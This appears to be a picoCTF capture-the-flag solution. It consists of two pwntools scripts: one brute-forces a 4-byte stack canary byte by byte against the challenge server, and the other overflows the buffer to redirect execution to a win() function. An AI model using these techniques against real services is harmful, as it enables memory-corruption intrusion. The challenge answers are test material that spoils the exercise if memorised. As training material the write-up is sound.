Do you think you can bypass the protection and get the flag?
Solution
canary_brute.py
from pwn import *
import string

# Target binary; pwntools reads arch/bits/OS from it so the context is set
# consistently for the rest of the script.
elf = context.binary = ELF('./vuln', checksec=False)
# Only show critical messages: one connection per guess is noisy otherwise.
context.log_level = 'critical'

# The 4-byte stack canary is recovered one character at a time. For each
# candidate character the script overflows the buffer up to and including
# the guessed prefix of the canary, then watches whether the binary reports
# "Smashing" (canary mismatch) or not (prefix correct). Every guess opens a
# fresh connection, so the remote side sees a burst of connections that
# each end in a canary-check failure -- the behaviour a per-byte canary
# leak produces and that a detection rule on repeated stack-check aborts
# would key on.
canary = ""
while len(canary) < 4:
    found = False
    # Keep cycling through the printable set until a character is accepted;
    # as in the original, there is no bound on how many passes are made.
    while not found:
        for ch in string.printable:
            # Local alternative to the remote service: conn = elf.process()
            conn = remote('saturn.picoctf.net', 63681)
            buffer_len = 64
            guess = canary + ch
            print(guess)
            payload = b'A' * buffer_len + guess.encode()
            # The service first asks how many bytes it should read, then
            # reads that many bytes.
            conn.sendlineafter(b'>', str(len(payload)).encode())
            conn.sendlineafter(b'>', payload)
            smashed = b'Smashing' in conn.recvline()
            conn.close()
            if smashed:
                # Wrong character: try the next printable one.
                continue
            # Prefix accepted: commit the character and move to the next byte.
            canary = guess
            found = True
            break
exploit.py
from pwn import *


# Allows you to switch between local / GDB / remote from the terminal
# (pwntools parses GDB=1 / REMOTE=1 into `args`; REMOTE expects
# `python exploit.py <server> <port>`).
def start(argv=[], *a, **kw):
    if args.GDB:
        # Debug locally under GDB using the gdbscript defined below.
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        # ('server', 'port') taken from the command line.
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    # Default: run the binary locally.
    return process([exe] + argv, *a, **kw)


# GDB commands used when started with GDB=1. The breakpoint address comes
# from the challenge binary as analysed in this writeup.
gdbscript = '''
init-pwndbg
break *0x8049534
continue
'''.format(**locals())

# Set up pwntools for the correct architecture.
exe = './vuln'
# context.binary automatically configures arch, bits, os, etc.
elf = context.binary = ELF(exe, checksec=False)
# Logging level to help with debugging (error / warning / info / debug).
context.log_level = 'debug'

# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================

io = start()

# Bytes from the start of the buffer to the canary.
padding = 64

# Layout as determined earlier in the writeup: buffer, the 4-byte canary
# value recovered by canary_brute.py, saved EBP plus a local int, then the
# return address pointing at win().
payload = flat(
    b'A' * padding,
    b'BiRd',      # Canary is here
    b'A' * 16,    # Saved RBP + int
    elf.symbols.win,
)

# The service asks for a length first, then reads that many bytes.
io.sendlineafter(b'>', str(len(payload)).encode())
# Send the payload.
io.sendlineafter(b'>', payload)

# Receive the flag.
io.recvuntil(b'?')
io.interactive()